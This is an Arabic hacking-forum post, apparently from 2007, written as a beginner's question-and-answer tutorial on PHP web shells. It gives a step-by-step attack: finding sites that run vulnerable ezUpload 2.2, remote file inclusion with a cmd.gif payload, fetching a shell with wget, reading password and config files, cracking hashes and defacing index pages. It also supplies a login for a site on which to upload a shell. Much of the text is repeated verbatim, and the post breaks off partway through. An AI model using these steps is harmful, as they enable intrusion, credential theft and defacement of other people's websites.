من طرف boukaissi الأحد ديسمبر 02, 2007 7:26 amالسلام عليكم ورحمه الله وبركاته
------------
موضوع اليوم متكرر في اكثر من منتدى عربي
ولكن حبيت اضع الموضوع علي صيغة سؤال وجواب
لكى تصل المعلومة للمبتدء ولو بشكل بسيط
والموضوع هو عن الشل واوامره واستخداماته .. إلخ
------------
بسم الله الرحمن الرحيم
------------
ماهو الشل ؟
الشل : عباره عن سكربت مكتوب بلغة الـphp ويستخدم بالكثير من عمليات الهاكرز
وهو اساسي لكل مبتدء للسيطره علي السيرفر بشكل كبير
-----------
طيب اذكر لنا بعض الاوامر المهمه ؟
ماطلب حاجه هناك اوامر كثيره ومنها ..
Ls
يستخدم لعرض الملفات الموجوده علي الموقع
Pwd
يستخدم لمعرفة مكان تواجدك بالسيرفر او بالموقع
id
يستخدم لمعرفة الصلاحيات التى تملكها
Wget
يستخدم لسحب ملف الي السيرفر ( رفع ملف )
وهناك الكثير من الاوامر وهذا الرابط به العديد من الاوامر مع استخداماتها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
------------
الله يعطيك العافيه طيب الحين انا تعلمت معني الشل وبعض اوامره طيب بسالك له انواع ولا لا ؟
اى نعم له انواع كثيره
------------
طيب ممكن تذكر لي كم مثال اذا ماعليك كلافه ؟
ان شاء الله طال عمرك بذكر لك كم نوع
Myshell
شل رائع جدا وسهل بنفس الوقت ويسمح لك بالتعديل علي الملفات
وتستطيع تعديل الاندكس بواسطة الامر
Edit index.php
( بشكل مختصر )
التحميل .. [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
R57shell 1.22
شل روسي حديث وبه العديد من المميزات
ومنها رفع ملف من جهازك الا الموقع مباشره
دون استخدام اى امر من اوامر لينكس
والاتصال بالباكدور سوا بلغة البيرل او السي
واظهار معلومات عن السيرفر من اصدار كيرنل ونوع .. إلخ
( بشكل مختصر )
التحميل ..[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
R57shell 1.23
ايضا شل حديث وهو ايضا روسي
وبه الكثير من المميزات الغير موجوده
بالشل السابق ومنها الاتصال بقاعده البيانات
واخذ نسخه من قاعده البيانات وايضا يوفر
الشل باكدور ولكنه غير فعال لتوفر جدار الحمايه
والكثير .. إلخ
( بشكل مختصر )
التحميل ..[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
' ويوجد العديد من الانواع '
------------
الحمدلله لحد الان فاهم معاك طيب ممكن اعرف كيف ارفع الشل علي موقع او منتدى ؟
هناك ثغرات عديده تسمح لك بتطبيق اوامر اللينكس وتستطيع رفع شل او باكدور علي الموقع
------------
رائع طيب اذكر لي ثغره لحد الان فعاله ؟
من عيوني توجد ثغره تسمح لك بتطبيق اوامر اللينكس وقد شرحتها بالمنتدى
وزيادة الخير خيرين وراح اشرحها لخاطرك ثاني مره
الثغره في السكربت ezUpload
وبالتحديد بالاصدار 2.2
------------
الله يعطيك العافيه وفهمت من كلامك انى ابحث بقوقل كذا ezUpload 2.2 ؟
نعم تبحث بقوقل مثل ماذكرت كذا ezUpload 2.2
------------
طيب وبحثت وحصلت لي موقع كيف استغل الثغره ؟
سؤال حلو وراح اجاوبك عليه اخوى والملفات المصابه من السكربت هي التاليه ..
customize.php
index.php
forum.php
initialize.php
يعني حصلنا موقع مصاب وخلنا نقول هالموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ومثل ماذكرت لك الملفات المصابه هي ..
customize.php
index.php
forum.php
initialize.php
يعني ناخذ اى ملف ونحطه ورا الرابط وخلنا نقول هالملف customize.php
يعني راح يصير الرابط كذا ..
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتبي تقول لي ماصار شيء وش استفد بقول لك لا تستعجل كل شيء بوقته
الحين بقول لك ارفع cmd.gif علي موقعك المجانى
------------
طيب بس سؤال واسف علي المقاطعه اذا ممكن ؟
تفضل اسأل اخوى ولا تعودهآ
------------
ان شاء الله بس حبيت اعرف وش هي cmd.gif يعني مو حلوه ارفعها ولا ادري وش فايدتها ؟
سؤال جيد بقول لك هذى تسمح لك بتطبيق اوامر اللينكس
------------
طيب بس سؤال ثاني لو سمحت يعني بس تجىء كذا cmd.gif ولا في نوع ثاني ؟
ايضا سؤال جيد نعم اخوى ممكن تجىء كذا cmd.gif وايضا ممكن تجى كذا cmd.txt ..إلخ
مقاطعه ' للتحميل cmd.gif اضغط [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] '
------------
طيب تفضل اخوى كمل شرحك اذا ممكن ؟
ان شاء الله طال عمرك صرت صبي عندك لؤؤؤؤل لا امزح معك يالله نكمل
مثل ماقلت لك اخترنا هالملف customize.php
وصار رابط الموقع كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الحين بقول لك هات رابط cmd.gif بعد مارفعتها علي موقعك
الحين عندنا الملفات المصابه وموقع مصاب و cmd.gif
بقول لك الان راح يكون رابط الموقع مع رابط cmd.gif كذا ..
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طيب تبي تقول ماصار شيء بقول لك ضيف بعد الرابط التالي ..
?&cmd=id
يعني راح يكون الرابط كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وراح يطلع لك التالي .. مثلا ..
uid=99(nobody) gid=99(nobody) groups=99(nobody)
------------
طيب اخوى دكتور جرح بس سؤال وش معني اللى ظهر لي ؟
انا شرحت لك ياخوى اول شيء ان هالامر id معناته يظهر صلاحيتك
وصلاحيتا الان nobody------------
مقاطعه " نكتب الامر التالي عشان نعرف احنا وين بالضبط واللى هو الامر .. "
Pwd
------------
طيب مشكور اخوي تفضل كمل الشرح اذا ماعليك امر ؟
امري لله وبكمل معاك للنهايه واشوف وش تاليها معاك
------------
الحين ظهرت صلاحيتا يالطيب بقول لك اول شيء نكتب الامر التالي ..
which wget
وادري تبي تقول وش هالامر بقول لك هالامر يشوف نقدر نسحب ملف علي الموقع ولا لا
يعني بالعربي اقدر ارفع ملف ولا لا
يالله نكتبه ونشوف وش يظهر لنا
------------
طيب بس سؤال وين اكتب الامر ؟
اخوى الامر نكتبه بدال id يعني راح نحذفها ونحط محلها which wget
------------
طيب كمل اخوى دكتور جرح ..
ابشر راح اكمل لخاطرك ولخاطر منتدى العاصفه
حلو ظهر لنا مثلا .. /usr/bin/wget وادري تبي تلقف
وتقول وش اللى ظهر لنا مافهمت !
بقول لك يعني نقدر نرفع ملف علي الموقع
بالعربي مسموح لنا نرفع
طيب الحين نبي نرفع اى شل من اللى شرحتهم انا
امممم
نقول Myshell
يالله ياخوى خلنا نرفع ونفتك من هالموقع ومنك لؤؤل
الحين بقول لك ارفع الشل علي موقعك المجانى ( الموقع راح فيها لؤؤل )
------------
مافهمت وضح لي اكثر لو سمحت ؟
طيب انت الان بعد ماحملت الشل ارفعه علي موقعك المجانى بصيغه zip يعني وين زاب
طيب فهمت عليك
------------
ياريت تكمل طال عمرك ..
ابشر راح اكمل معاك
الحين بقول لك جيب رابط الشل بعد مارفعته علي موقعك المجانى
وخلنا نرفعه علي الموقع االلى نطبق عليه من اليوم
وادري ياخوي بتقول كيف ارفع والله ادري
بقول لك انا قلت لك بالبدايه هالامر wget وظيفته الرفع علي الموقع
طيب يالله خلنا نرفع
بس بقول لك صبر قبل لا نرفع خل نشوف لنا ملف تصريحه 777
------------
طيب بس سؤال ليش ملف تصريحه 777 ؟
عشان ياخوى تقدر تستخدم اى امر فيه
من قراءه،رفع،تعديل .. إلخ
------------
طيب فهمت عليك يالله كمل اخوى ..
ان شاء الله بكمل والحين نعرض الملفات مع تصاريحها بالامر ls –l
ظهرت لنا الملفات مع تصاريحها
ونشوف الملف اللى تصريحه 777 ويجيك كذا ..
rwxrwxrwx
طيب ياخوي تبي تقول ماحصلت ملف وش اسوى ؟
بقول لك عط تصريح لاي ملف وان شاء الله مسموح لك
------------
طيب ياخوي ما اعرف كيف اعطي تصريح لملف ممكن تقول لي الطريقه ؟
ان شاء الله اخوى الطريقه كالتالي ..
Chmod 777 filename
------------
طيب اخوى ممكن توضح اكثر لانى مو عارف شيء ؟
ابشر اخوي راح اوضح لك اكثر وبقول لك ..
Chmod = يستخدم هالامر لاعطاء التصريحات للملفات
777 = تصريح رقم 777 وذكرت وش معناته
Filename = اسم الملف اللى نبي نعطيه التصريح رقم 777
------------
طيب فهمت عليك الله يجزاك خير كمل ..
يالله نكمل تبي تقول عطيته تصريح وابي اتآكد انه يملك التصريح 777 بقول لك اعرض الملفات من جديد مع تصاريحها بالامر ls –l
وراح تحصل الملف اللى عطيته التصريح رقم 777 مكتوب جمبه التالي ..
rwxrwxrwx
تمام يعني الحين نقدر نسوى اى شيء علي هالملف
يالله الان نبي نرفع الشل ( ماصارت رفع لؤؤل )
ونكتب بدال الامر ls –l لان اخر امر كتبناه هالامر التالي ..
wget [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] myshell*
طيب بقول لك وش المتغيرات
Xxx = اسم موقعك المجانى
Myshell.zip = اسم الشل اللى رفعته علي موقعك
طيب حلو تبي تقول ليش كتبنه ls بقول لك عشان نتآكد ان لشل مرفوع
طيب الحين يوم كتبنا الامر ls شفنا الملفات وطلع منهم الشل اللى رفعناه
بقول لك زين علي زين الحين نفك الضغط عن الشل وادري تبي تقول لي كيف
بقول لك من عيوني الحين اعلمك كيف ونكتب الامر التالي ..
Unzip myshell.zip;ls
المتغيرات ..
myshell.zip = اسم الشل اللى رفعناه علي موقعنا
والامر ls كتبناه عشان نشوف الشل بعد فك الضغط موجود ولا لا
طيب طلعت لنا الملفات ومنهم الشل مالنا ومكتوب كذا myshell.php
بقول لك حلو وماشاء الله عليك شكلك فاهم المهم الحين نبي نروح للشل مالنا
بقول لك ابشر وماطلبت حاجه
مثلا رفعنا الشل علي المجلد الرئيسي للموقع راح يكون رابطه كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طيب رفعناه علي المنتدى راح يكون رابطه كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واعتقد القصد وضح لك يعني الملف اللى رفعنا عليه الشل
نحطه بعد رابط الموقع وبعده اسم الشل اللي فرضنا اسمه هو myshell
واعتقد ذكرت بالبدايه ان نكتب الامر pwd عشان نعرف احنا وين بالضبط
الان الحمدلله الشل مرفوع وكل شيء تمام
------------
بس يادكتور طلب منى باسورد الشل مع اليوزر وش اسوى ؟
يالطيب تقدر تغير الباسورد واليوزر علي كيفك لكن انا مخليهم
User = Dr.Jr7
Pass = Dr.Jr7
------------
طيب تمام عليك قدرت ادخل الشل وش اسوى ؟
يالطيب راح اذكر لك بعض الاوامر المهمه ..
الامر ..
cat /home/*/public_html/_vti_pvt/service.pwd
لجلب باسوردات المشفره ويوزر نيم
------------
الامر ..
cat /home/*/public_html/_vti_pvt/access.cnf
الثاني يوزر نيم والموقع
------------
الامر ..
ls /var/named
وهو لاستعراض المواقع علي الموجوده علي السيرفر
------------
الامر ..
لاخراج المواقع اللى على السيرفر
cat /etc/httpd/conf/httpd.conf
------------
الامر ..
cat /home/*/public_html/_vti_pvt/service.pwd
أمر جلب باسوردات المواقع التي تستخدم الفرونت بيج
------------
الامر ..
cat /home/*/public_html/_vti_pvt/access.cnf
أمر معرفة أسامي المواقع التي تستخدم الفرونت بيج
------------
الامر ..
cat /home/*/public_html/*/admin/config.php
cat /home/*/public_html/*/admincp/config.php
أمر عرض ملفات الــ config.php للبرامج المثبته على المواقع مثل
المنتديات والمجلات وغيرها ممن تستخدم ملفات الــ config
------------
الامر ..
cat /etc/domainalias
عرض المواقع مع أسامي المستخدمين
------------
الامر ..
find / -name config.php
البحث عن جميع الملفات التي إسمها config.php
وستطيع البحث في هذا الأمر عن أي ملف تريد
------------
الامر ..
cat /etc/passwd
يظهر جميع باسوردات المواقع التي على السيرفر
وإذا كان اللي ظهر لك بالطريقه هذي
carlos:vmYQDR1pWRVLE
معناها ان carlos إسم الموقع
وإن vmYQDR1pWRVLE هو الباسورد المشفر
أما إن طلع لك بالطريقه هذي
carlos:x
فمعنى الــ x ان الباسورد مخفي وما تقدر تشوفه
------------
يعطيك العافيه اخوي دكتور جرح علي الاوامر بس هذى الاوامر ؟
العفو اخوى ولا موبس هذى الاوامر وانا باخر الشرح بحط ملف فيه اوامر وبعض الاشياء المهمه
وطبعا كل الشكر ( لشبح الليل) لان هو اللى كاتب الاوامر
------------
الله يعطيه العافيه طيب الحين وعرفت الشل وعرفت اوامره وعرفت ارفع شل وعرفت ولله الحمد بعد ما ادخل الشل وش اسوى طيب انت قلت تقدر تغير
الاندكس وانت من الشل وضح لي اكثر ؟
اول شيء الحمدلله انى قدرت افهمك كم شغله بسيطه واما بخصوص الاندكس نعم تقدر
واول شيء تشوف انت وينك بالضبط بالامر pwd ونقول مثلا انت بالمنتدى
بتقول يادكتور برجع للمجلد الرئيسي كيف ؟
بقول اكتب cd .. واضغط انتر بعدها اكتب pwd راح تلاحظ
انك انت بالمجلد الرئيسي طيب تبي تقول حلو
بس الحين وش اسوى بقول لك اكتب ls وراح تظهر الملفات
وراح تلاحظ وجود index.php or index.html
طيب بتقول حلو الحين وش اسوى بقول لك اكتب الامر التالي ..
edit index.php
طيب بتقول وش اسوى الحين ظهر لي السورس مال الصفحه بقول لك امسح السورس
وروح للفرونت بيج واكيد انت مجهز صفحت الاختراق وانسخ الكود وحطه بدال السورس
اللى مسحته قبل شوى بعدها اضغط علي save and exit طيب وراح يظهر لك التالي ..
Filename: Filename: saved
ويعني حفظ التغيرات
والحين تغيرت الصفحه الرئيسيه
وتقدر تلاحظ انت بنفسك وتشوف تغيرت ولا لا ( تكتب الموقع بحاله وتشوف )
------------
الله يعطيك العافيه والحمدلله قدرت افهم اشياء كثيره طيب الحين الاندكس بس بالمجلد الرئيسي ؟
علي ما اعتقد نعم ( غالبا )
------------
طيب يادكتور نسيت اسالك سؤال ؟
شنو السؤال ..؟
------------
الحين انا جبت باسوردات المواقع مشفره كيف افك التشفير ؟
بقول لك استخدم برنامج john واعتقد مشروح بالمنتدى
------------
طيب يعطيك العافيه ومثلا قدرت افك الباسورد المشفر كيف اقدر ادخل ؟
بقول لك تقدر من الإف تي بي او تكتب بعد رابط الموقع ..
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
------------
الله يعطيك العافيه ومن جد ماقصرت بس بسالك اقدر اشوف باسورد الموقع اذا كان يدعم الفرونت بيج ؟
بقول لك نعم تقدر وتروح للمسار التالي وانت بالشل
cd / public_html/_vti_pvt
بعدها بقول لك اعرض الملفات بالامر ls
وراح تلاحظ من الملفات الموجوده هالملف service.pwd
بتقول لي كيف اروح له بقول لك لا تروح له أقرأ الملف عادى
وادري بتسأل وتقول كيف اقرأ او شنو امر القراءة بقول لك امر القراءة هو cat
يعني نكتب الامر التالي ..
cat service.pwd
وراح تلاحظ الباسورد مشفر قدامك ان شاء الله
------------
طيب اخوى جرح ممكن تعطيني شل انت رافعه اذا ممكن بس ؟
ابشر طال عمرك وهذا موقع لك ارفع عليه شل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
username = shawn
assword = babysox
يعطيك العافيه اخوى دكتور جرح وماقصرت يالله فمان الله
حياك الله حبيبي وفمان الكريم
------------
ملاحظة ..
باسورد فك الضغط = Dr.Jr7
------------
بالنهايه اعتذر لعدم شرحي بالصور واعتذر ان كان هناك اى خطأء والانسان
مو معصوم من الخطأ وان شاء الله في الدرس القادم راح اشرح الباكدور وكيف نرفعه
ونشغله ومن هالامور هذى وبالصور ان شاء الله
وبالاخير اتمنى للمبتدئين كل خير
------------
موضوع اليوم متكرر في اكثر من منتدى عربي
ولكن حبيت اضع الموضوع علي صيغة سؤال وجواب
لكى تصل المعلومة للمبتدء ولو بشكل بسيط
والموضوع هو عن الشل واوامره واستخداماته .. إلخ
------------
بسم الله الرحمن الرحيم
------------
ماهو الشل ؟
الشل : عباره عن سكربت مكتوب بلغة الـphp ويستخدم بالكثير من عمليات الهاكرز
وهو اساسي لكل مبتدء للسيطره علي السيرفر بشكل كبير
-----------
طيب اذكر لنا بعض الاوامر المهمه ؟
ماطلب حاجه هناك اوامر كثيره ومنها ..
Ls
يستخدم لعرض الملفات الموجوده علي الموقع
Pwd
يستخدم لمعرفة مكان تواجدك بالسيرفر او بالموقع
id
يستخدم لمعرفة الصلاحيات التى تملكها
Wget
يستخدم لسحب ملف الي السيرفر ( رفع ملف )
وهناك الكثير من الاوامر وهذا الرابط به العديد من الاوامر مع استخداماتها
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
------------
الله يعطيك العافيه طيب الحين انا تعلمت معني الشل وبعض اوامره طيب بسالك له انواع ولا لا ؟
اى نعم له انواع كثيره
------------
طيب ممكن تذكر لي كم مثال اذا ماعليك كلافه ؟
ان شاء الله طال عمرك بذكر لك كم نوع
Myshell
شل رائع جدا وسهل بنفس الوقت ويسمح لك بالتعديل علي الملفات
وتستطيع تعديل الاندكس بواسطة الامر
Edit index.php
( بشكل مختصر )
التحميل .. [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
R57shell 1.22
شل روسي حديث وبه العديد من المميزات
ومنها رفع ملف من جهازك الا الموقع مباشره
دون استخدام اى امر من اوامر لينكس
والاتصال بالباكدور سوا بلغة البيرل او السي
واظهار معلومات عن السيرفر من اصدار كيرنل ونوع .. إلخ
( بشكل مختصر )
التحميل ..[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
R57shell 1.23
ايضا شل حديث وهو ايضا روسي
وبه الكثير من المميزات الغير موجوده
بالشل السابق ومنها الاتصال بقاعده البيانات
واخذ نسخه من قاعده البيانات وايضا يوفر
الشل باكدور ولكنه غير فعال لتوفر جدار الحمايه
والكثير .. إلخ
( بشكل مختصر )
التحميل ..[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
' ويوجد العديد من الانواع '
------------
الحمدلله لحد الان فاهم معاك طيب ممكن اعرف كيف ارفع الشل علي موقع او منتدى ؟
هناك ثغرات عديده تسمح لك بتطبيق اوامر اللينكس وتستطيع رفع شل او باكدور علي الموقع
------------
رائع طيب اذكر لي ثغره لحد الان فعاله ؟
من عيوني توجد ثغره تسمح لك بتطبيق اوامر اللينكس وقد شرحتها بالمنتدى
وزيادة الخير خيرين وراح اشرحها لخاطرك ثاني مره
الثغره في السكربت ezUpload
وبالتحديد بالاصدار 2.2
------------
الله يعطيك العافيه وفهمت من كلامك انى ابحث بقوقل كذا ezUpload 2.2 ؟
نعم تبحث بقوقل مثل ماذكرت كذا ezUpload 2.2
------------
طيب وبحثت وحصلت لي موقع كيف استغل الثغره ؟
سؤال حلو وراح اجاوبك عليه اخوى والملفات المصابه من السكربت هي التاليه ..
customize.php
index.php
forum.php
initialize.php
يعني حصلنا موقع مصاب وخلنا نقول هالموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ومثل ماذكرت لك الملفات المصابه هي ..
customize.php
index.php
forum.php
initialize.php
يعني ناخذ اى ملف ونحطه ورا الرابط وخلنا نقول هالملف customize.php
يعني راح يصير الرابط كذا ..
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتبي تقول لي ماصار شيء وش استفد بقول لك لا تستعجل كل شيء بوقته
الحين بقول لك ارفع cmd.gif علي موقعك المجانى
------------
طيب بس سؤال واسف علي المقاطعه اذا ممكن ؟
تفضل اسأل اخوى ولا تعودهآ
------------
ان شاء الله بس حبيت اعرف وش هي cmd.gif يعني مو حلوه ارفعها ولا ادري وش فايدتها ؟
سؤال جيد بقول لك هذى تسمح لك بتطبيق اوامر اللينكس
------------
طيب بس سؤال ثاني لو سمحت يعني بس تجىء كذا cmd.gif ولا في نوع ثاني ؟
ايضا سؤال جيد نعم اخوى ممكن تجىء كذا cmd.gif وايضا ممكن تجى كذا cmd.txt ..إلخ
مقاطعه ' للتحميل cmd.gif اضغط [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] '
------------
طيب تفضل اخوى كمل شرحك اذا ممكن ؟
ان شاء الله طال عمرك صرت صبي عندك لؤؤؤؤل لا امزح معك يالله نكمل
مثل ماقلت لك اخترنا هالملف customize.php
وصار رابط الموقع كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الحين بقول لك هات رابط cmd.gif بعد مارفعتها علي موقعك
الحين عندنا الملفات المصابه وموقع مصاب و cmd.gif
بقول لك الان راح يكون رابط الموقع مع رابط cmd.gif كذا ..
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طيب تبي تقول ماصار شيء بقول لك ضيف بعد الرابط التالي ..
?&cmd=id
يعني راح يكون الرابط كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وراح يطلع لك التالي .. مثلا ..
uid=99(nobody) gid=99(nobody) groups=99(nobody)
------------
طيب اخوى دكتور جرح بس سؤال وش معني اللى ظهر لي ؟
انا شرحت لك ياخوى اول شيء ان هالامر id معناته يظهر صلاحيتك
وصلاحيتا الان nobody------------
مقاطعه " نكتب الامر التالي عشان نعرف احنا وين بالضبط واللى هو الامر .. "
Pwd
------------
طيب مشكور اخوي تفضل كمل الشرح اذا ماعليك امر ؟
امري لله وبكمل معاك للنهايه واشوف وش تاليها معاك
------------
الحين ظهرت صلاحيتا يالطيب بقول لك اول شيء نكتب الامر التالي ..
which wget
وادري تبي تقول وش هالامر بقول لك هالامر يشوف نقدر نسحب ملف علي الموقع ولا لا
يعني بالعربي اقدر ارفع ملف ولا لا
يالله نكتبه ونشوف وش يظهر لنا
------------
طيب بس سؤال وين اكتب الامر ؟
اخوى الامر نكتبه بدال id يعني راح نحذفها ونحط محلها which wget
------------
طيب كمل اخوى دكتور جرح ..
ابشر راح اكمل لخاطرك ولخاطر منتدى العاصفه
حلو ظهر لنا مثلا .. /usr/bin/wget وادري تبي تلقف
وتقول وش اللى ظهر لنا مافهمت !
بقول لك يعني نقدر نرفع ملف علي الموقع
بالعربي مسموح لنا نرفع
طيب الحين نبي نرفع اى شل من اللى شرحتهم انا
امممم
نقول Myshell
يالله ياخوى خلنا نرفع ونفتك من هالموقع ومنك لؤؤل
الحين بقول لك ارفع الشل علي موقعك المجانى ( الموقع راح فيها لؤؤل )
------------
مافهمت وضح لي اكثر لو سمحت ؟
طيب انت الان بعد ماحملت الشل ارفعه علي موقعك المجانى بصيغه zip يعني وين زاب
طيب فهمت عليك
------------
ياريت تكمل طال عمرك ..
ابشر راح اكمل معاك
الحين بقول لك جيب رابط الشل بعد مارفعته علي موقعك المجانى
وخلنا نرفعه علي الموقع االلى نطبق عليه من اليوم
وادري ياخوي بتقول كيف ارفع والله ادري
بقول لك انا قلت لك بالبدايه هالامر wget وظيفته الرفع علي الموقع
طيب يالله خلنا نرفع
بس بقول لك صبر قبل لا نرفع خل نشوف لنا ملف تصريحه 777
------------
طيب بس سؤال ليش ملف تصريحه 777 ؟
عشان ياخوى تقدر تستخدم اى امر فيه
من قراءه،رفع،تعديل .. إلخ
------------
طيب فهمت عليك يالله كمل اخوى ..
ان شاء الله بكمل والحين نعرض الملفات مع تصاريحها بالامر ls –l
ظهرت لنا الملفات مع تصاريحها
ونشوف الملف اللى تصريحه 777 ويجيك كذا ..
rwxrwxrwx
طيب ياخوي تبي تقول ماحصلت ملف وش اسوى ؟
بقول لك عط تصريح لاي ملف وان شاء الله مسموح لك
------------
طيب ياخوي ما اعرف كيف اعطي تصريح لملف ممكن تقول لي الطريقه ؟
ان شاء الله اخوى الطريقه كالتالي ..
Chmod 777 filename
------------
طيب اخوى ممكن توضح اكثر لانى مو عارف شيء ؟
ابشر اخوي راح اوضح لك اكثر وبقول لك ..
Chmod = يستخدم هالامر لاعطاء التصريحات للملفات
777 = تصريح رقم 777 وذكرت وش معناته
Filename = اسم الملف اللى نبي نعطيه التصريح رقم 777
------------
طيب فهمت عليك الله يجزاك خير كمل ..
يالله نكمل تبي تقول عطيته تصريح وابي اتآكد انه يملك التصريح 777 بقول لك اعرض الملفات من جديد مع تصاريحها بالامر ls –l
وراح تحصل الملف اللى عطيته التصريح رقم 777 مكتوب جمبه التالي ..
rwxrwxrwx
تمام يعني الحين نقدر نسوى اى شيء علي هالملف
يالله الان نبي نرفع الشل ( ماصارت رفع لؤؤل )
ونكتب بدال الامر ls –l لان اخر امر كتبناه هالامر التالي ..
wget [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] myshell*
طيب بقول لك وش المتغيرات
Xxx = اسم موقعك المجانى
Myshell.zip = اسم الشل اللى رفعته علي موقعك
طيب حلو تبي تقول ليش كتبنه ls بقول لك عشان نتآكد ان لشل مرفوع
طيب الحين يوم كتبنا الامر ls شفنا الملفات وطلع منهم الشل اللى رفعناه
بقول لك زين علي زين الحين نفك الضغط عن الشل وادري تبي تقول لي كيف
بقول لك من عيوني الحين اعلمك كيف ونكتب الامر التالي ..
Unzip myshell.zip;ls
المتغيرات ..
myshell.zip = اسم الشل اللى رفعناه علي موقعنا
والامر ls كتبناه عشان نشوف الشل بعد فك الضغط موجود ولا لا
طيب طلعت لنا الملفات ومنهم الشل مالنا ومكتوب كذا myshell.php
بقول لك حلو وماشاء الله عليك شكلك فاهم المهم الحين نبي نروح للشل مالنا
بقول لك ابشر وماطلبت حاجه
مثلا رفعنا الشل علي المجلد الرئيسي للموقع راح يكون رابطه كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طيب رفعناه علي المنتدى راح يكون رابطه كذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واعتقد القصد وضح لك يعني الملف اللى رفعنا عليه الشل
نحطه بعد رابط الموقع وبعده اسم الشل اللي فرضنا اسمه هو myshell
واعتقد ذكرت بالبدايه ان نكتب الامر pwd عشان نعرف احنا وين بالضبط
الان الحمدلله الشل مرفوع وكل شيء تمام
------------
بس يادكتور طلب منى باسورد الشل مع اليوزر وش اسوى ؟
يالطيب تقدر تغير الباسورد واليوزر علي كيفك لكن انا مخليهم
User = Dr.Jr7
Pass = Dr.Jr7
------------
طيب تمام عليك قدرت ادخل الشل وش اسوى ؟
يالطيب راح اذكر لك بعض الاوامر المهمه ..
الامر ..
cat /home/*/public_html/_vti_pvt/service.pwd
لجلب باسوردات المشفره ويوزر نيم
------------
الامر ..
cat /home/*/public_html/_vti_pvt/access.cnf
الثاني يوزر نيم والموقع
------------
الامر ..
ls /var/named
وهو لاستعراض المواقع علي الموجوده علي السيرفر
------------
الامر ..
لاخراج المواقع اللى على السيرفر
cat /etc/httpd/conf/httpd.conf
------------
الامر ..
cat /home/*/public_html/_vti_pvt/service.pwd
أمر جلب باسوردات المواقع التي تستخدم الفرونت بيج
------------
الامر ..
cat /home/*/public_html/_vti_pvt/access.cnf
أمر معرفة أسامي المواقع التي تستخدم الفرونت بيج
------------
الامر ..
cat /home/*/public_html/*/admin/config.php
cat /home/*/public_html/*/admincp/config.php
أمر عرض ملفات الــ config.php للبرامج المثبته على المواقع مثل
المنتديات والمجلات وغيرها ممن تستخدم ملفات الــ config
------------
الامر ..
cat /etc/domainalias
عرض المواقع مع أسامي المستخدمين
------------
الامر ..
find / -name config.php
البحث عن جميع الملفات التي إسمها config.php
وستطيع البحث في هذا الأمر عن أي ملف تريد
------------
الامر ..
cat /etc/passwd
يظهر جميع باسوردات المواقع التي على السيرفر
وإذا كان اللي ظهر لك بالطريقه هذي
carlos:vmYQDR1pWRVLE
معناها ان carlos إسم الموقع
وإن vmYQDR1pWRVLE هو الباسورد المشفر
أما إن طلع لك بالطريقه هذي
carlos:x
فمعنى الــ x ان الباسورد مخفي وما تقدر تشوفه
------------
يعطيك العافيه اخوي دكتور جرح علي الاوامر بس هذى الاوامر ؟
العفو اخوى ولا موبس هذى الاوامر وانا باخر الشرح بحط ملف فيه اوامر وبعض الاشياء المهمه
وطبعا كل الشكر ( لشبح الليل) لان هو اللى كاتب الاوامر
------------
الله يعطيه العافيه طيب الحين وعرفت الشل وعرفت اوامره وعرفت ارفع شل وعرفت ولله الحمد بعد ما ادخل الشل وش اسوى طيب انت قلت تقدر تغير
الاندكس وانت من الشل وضح لي اكثر ؟
اول شيء الحمدلله انى قدرت افهمك كم شغله بسيطه واما بخصوص الاندكس نعم تقدر
واول شيء تشوف انت وينك بالضبط بالامر pwd ونقول مثلا انت بالمنتدى
بتقول يادكتور برجع للمجلد الرئيسي كيف ؟
بقول اكتب cd .. واضغط انتر بعدها اكتب pwd راح تلاحظ
انك انت بالمجلد الرئيسي طيب تبي تقول حلو
بس الحين وش اسوى بقول لك اكتب ls وراح تظهر الملفات
وراح تلاحظ وجود index.php or index.html
طيب بتقول حلو الحين وش اسوى بقول لك اكتب الامر التالي ..
edit index.php
طيب بتقول وش اسوى الحين ظهر لي السورس مال الصفحه بقول لك امسح السورس
وروح للفرونت بيج واكيد انت مجهز صفحت الاختراق وانسخ الكود وحطه بدال السورس
اللى مسحته قبل شوى بعدها اضغط علي save and exit طيب وراح يظهر لك التالي ..
Filename: Filename: saved
ويعني حفظ التغيرات
والحين تغيرت الصفحه الرئيسيه
وتقدر تلاحظ انت بنفسك وتشوف تغيرت ولا لا ( تكتب الموقع بحاله وتشوف )
------------
